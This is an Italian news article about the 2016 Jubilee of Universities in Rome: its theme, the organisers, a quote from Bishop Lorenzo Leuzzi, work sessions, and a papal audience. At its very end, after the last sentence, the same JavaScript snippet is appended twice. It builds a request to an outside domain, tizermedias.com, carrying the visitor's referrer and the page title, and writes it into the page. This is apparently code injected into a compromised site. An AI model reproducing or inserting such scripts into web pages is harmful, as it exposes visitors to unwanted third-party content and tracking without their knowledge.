Giubileo delle università 2016

L’Anno Santo della misericordia voluto dal Papa Francesco non poteva dimenticare il mondo accademico, al quale è affidata una fondamentale funzione educativa nei confronti dei giovani di tutto il mondo. Per questo motivo dal prossimo 7 settembre e fino all’11 sono previste una serie di iniziative dedicate proprio a questo settore e ai suoi protagonisti, che insieme daranno vita al Giubileo delle università. A fare da filo conduttore all’evento sarà il tema “Conoscenza e Misericordia. La terza missione dell’Università”.

A promuovere il Giubileo delle università è la Congregazione per l’educazione cattolica in collaborazione con Ufficio per la pastorale universitaria della diocesi di Roma, e il Ministero dell’Istruzione, dell’Università e della Ricerca (MIUR). A proposito dell’evento, il vescovo Lorenzo Leuzzi, delegato per l’Ufficio diocesano per la pastorale universitaria, ha spiegato che si tratta di un appuntamento molto importante “perché offre un’occasione per andare ancora più in profondità sul tema della misericordia e dunque il tentativo di passare dalla misericordia assistenziale al quella progettuale. Siamo di fronte a un cambiamento d’epoca che impone una nuova riflessione, cioè quella di cercare di lavorare insieme con la collaborazione di tutti, perché l’umanità ha davanti a sé grandi sfide nelle quali e per le quali l’università deve svolgere un ruolo determinante”.

Il fulcro del Giubileo delle Università e dei Centri di Ricerca e delle Istituzioni dell’Alta Formazione Artistica e Coreutica saranno 20 sessioni di lavoro con un numero di relatori, provenienti dai cinque continenti, che supererà i mille e che affronteranno una vasta serie di temi: da quelli economici e finanziari a quelli relativi alla bioetica, alla psicologia e alla psicologia, passando per quelli della comunicazione. Inoltre è prevista una tavola rotonda alla quale parteciperanno più di 50 rettori giunti da ogni parte del mondo.

Ma il vero momento clou del Giubileo delle università arriverà sabato 10 settembre, quando coloro che avranno partecipato alle attività saranno attesi in piazza San Pietro per partecipare a un’udienza collettiva con Papa Francesco.(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();